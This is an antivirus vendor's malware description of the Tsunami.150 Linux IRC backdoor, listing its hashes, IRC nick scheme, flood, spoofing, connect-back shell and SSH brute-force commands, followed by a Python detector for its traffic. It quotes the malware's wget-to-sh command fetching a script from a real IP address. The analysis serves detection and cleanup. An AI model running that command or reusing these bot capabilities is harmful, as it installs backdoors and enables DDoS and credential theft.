Linux.BackDoor.Tsunami.150

Added to the Dr.Web virus database: 2015-07-23

Description added:

SHA1:

  • 3a99f7816c6864fd36ceea3380e591d337b0b241 (unpacked)
  • 691704fb9de3e1d4a6c5b84b99be71ef375257a8 (packed)

A backdoor for Linux OSes that is installed on the system by Linux.PNScan.1. It uses "/var/run/.boss.pid" as a lock file.

To connect to the IRC server, the Trojan generates the name and nickname string from the following template:

m64|dog|root|%c%c%c%c%c%c%c%c%c

where each %c is a random digit from the "0123456789" set.

If the connection attempt succeeds, the malicious program sends the following commands to the server:

NICK <nick>\n
USER x00 localhost localhost :dogscan\n

where <nick> is the nickname generated as described above.

After establishing a connection to the IRC server, the malicious program waits for incoming commands. The backdoor can execute the following commands:

Command | Action | Comments
352 | Set a fake IP |
376 | Join the channel | Send(fd, "MODE %s -xi\n", nick); Send(fd, "MODE %s +B\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass);
433 | Generate a new nickname |
ERROR | Generate a new nickname |
422 | Join the channel | Send(fd, "MODE %s -xi\n", nick); Send(fd, "MODE %s +B\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass);
NICK | Take a string from the command as a nickname |
PING | Send PONG |
PRIVMSG | Execute a special command |

Moreover, the Trojan can execute a number of extended commands.

Command | Action | Syntax
RANDOMFLOOD | Randomly switch between ACK and SYN Flood | RANDOMFLOOD <target> <port> <secs>
NSACKFLOOD | ACK Flood | NSACKFLOOD <target> <port> <secs>
NSSYNFLOOD | SYN Flood | NSSYNFLOOD <target> <port> <secs>
ACKFLOOD | ACK Flood (spoofed) |
SYNFLOOD | SYN Flood (spoofed) | SYNFLOOD <target> <port> <secs>
UDP | UDP Flood | UDP <target> <port> <secs>
UNKNOWN | Launch a DDoS attack | UNKNOWN <target> <secs>
SERVER | Change the server to the one specified in the command |
GETSPOOFS | Get spoofing parameters |
SPOOFS | Set an IP or an IP range for spoofing | SPOOFS <iprange/ip>
GET | Download a specified file | GET <url> <save as>
VERSION | Return the backdoor's version |
KILLALL | Terminate a DDoS attack |
HELP | Display the list of available commands |
CBACK | Connect back | CBACK <ip> <port> connectback shell
SCANRND | Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used) | SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes>
SCANRND2 | Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a dictionary specified in the incoming parameters is used) | SCANRND2 <192 or 192.168 or 192.168.0> <threads> <minutes> <user> <passwd>
SCANSUB | Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary) | SCANSUB <192.168> <threads>
SCANSUB2 | Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a dictionary specified in the incoming parameters) | SCANSUB2 <192.168> <threads> <user> <passwd>
DOGRND | Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used) | DOGRND <192 or 192.168 or 192.168.0> <threads> <minutes>
DOGSUB | Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary) | DOGSUB <192.168> <threads>
IRC | Send specified IRC commands to the server | IRC <arg1> <arg2> <arg...>
SH | Execute a set of SH commands | SH <arg1> <arg2> <arg...>

Once a login:password combination is found, SCANRND, SCANRND2, SCANSUB and SCANSUB2 execute the following command on the remote system:

wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>&1

or

wget -qO - http://104.199.135.124/wgsh | sh > /dev/null 2>&1

The downloaded scripts install Linux.BackDoor.Tsunami.144 on the system.

Once a login:password combination is found, DOGRND and DOGSUB execute the following command:

uname -a || echo -

After that, the "##scaninfo##" user receives the following information in the IRC chat:

[g+] <login>@<ip> | <password> | <os> \n
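As an added example (not part of the Dr.Web description), a small Python detector that flags the two registration lines and the "##scaninfo##" report format quoted above in captured IRC traffic. It reads the nick template literally, with the '|' characters as part of the nick and each %c as one digit; the sample session lines are constructed.

```python
import re

# Indicators taken from the description above. The nick template
# "m64|dog|root|%c%c%c%c%c%c%c%c%c" is read literally: '|' is part of
# the nick and each %c is one digit from "0123456789".
NICK_RE = re.compile(r"^NICK\s+:?m64\|dog\|root\|[0-9]{9}\s*$")
# USER registration line sent right after NICK, as quoted on the page.
USER_RE = re.compile(r"^USER\s+x00\s+localhost\s+localhost\s+:dogscan\s*$")
# Credential report posted to "##scaninfo##" after a DOGRND/DOGSUB hit:
# "[g+] <login>@<ip> | <password> | <os>"
REPORT_RE = re.compile(
    r"\[g\+\]\s+(?P<login>\S+)@(?P<ip>\S+)\s+\|\s+(?P<password>.*?)\s+\|\s+(?P<os>.*)$"
)


def classify_line(line):
    """Return the indicator name matched by one IRC line, or None."""
    line = line.rstrip("\r\n")
    if NICK_RE.match(line):
        return "tsunami_nick"
    if USER_RE.match(line):
        return "tsunami_user"
    if REPORT_RE.search(line):
        return "tsunami_scan_report"
    return None


def scan_stream(lines):
    """Count hits per indicator and pull (login, ip, os) out of any reports."""
    hits = {}
    reports = []
    for line in lines:
        tag = classify_line(line)
        if tag is None:
            continue
        hits[tag] = hits.get(tag, 0) + 1
        if tag == "tsunami_scan_report":
            m = REPORT_RE.search(line)
            reports.append((m.group("login"), m.group("ip"), m.group("os")))
    return hits, reports


# Constructed sample of an IRC session as a network sensor might record it.
SAMPLE = [
    "NICK m64|dog|root|482915037",
    "USER x00 localhost localhost :dogscan",
    "PING :irc.example",
    "PRIVMSG ##scaninfo## :[g+] root@192.0.2.15 | pass123 | Linux host 3.10.0 x86_64",
    "NICK legit_user",
]

if __name__ == "__main__":
    print(scan_stream(SAMPLE))
```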

Curing recommendations

Linux

On the booted OS, run a full scan of all disk partitions using Dr.Web Anti-virus for Linux.
